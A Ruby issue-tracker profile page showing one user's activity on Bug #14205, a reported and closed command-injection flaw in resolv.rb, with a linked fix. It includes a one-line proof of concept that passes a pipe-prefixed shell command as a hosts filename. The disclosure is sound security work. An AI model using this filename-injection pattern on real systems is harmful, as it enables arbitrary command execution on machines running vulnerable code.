General

Profile

drigg3r (Jasraj Bedi)

  • Login: drigg3r
  • Registered on: 12/19/2017
  • Last sign in: 12/19/2017

Issues

open closed Total
Assigned issues 0 0 0
Reported issues 0 1 1

Activity

12/19/2017

10:08 AM Ruby Bug #14205: Unsanitizied filename leads to command injection in 'resolv.rb'
PoC Concept Code
~~~ ruby
require 'resolv'
a = Resolv::Hosts::new("|echo 1 > /tmp/rce")
a.getaddress("test")
~~~
 drigg3r (Jasraj Bedi)
10:07 AM Ruby Bug #14205 (Closed): Unsanitizied filename leads to command injection in 'resolv.rb'
Here is the pull request
https://github.com/ruby/ruby/pull/1777 drigg3r (Jasraj Bedi)

Also available in: Atom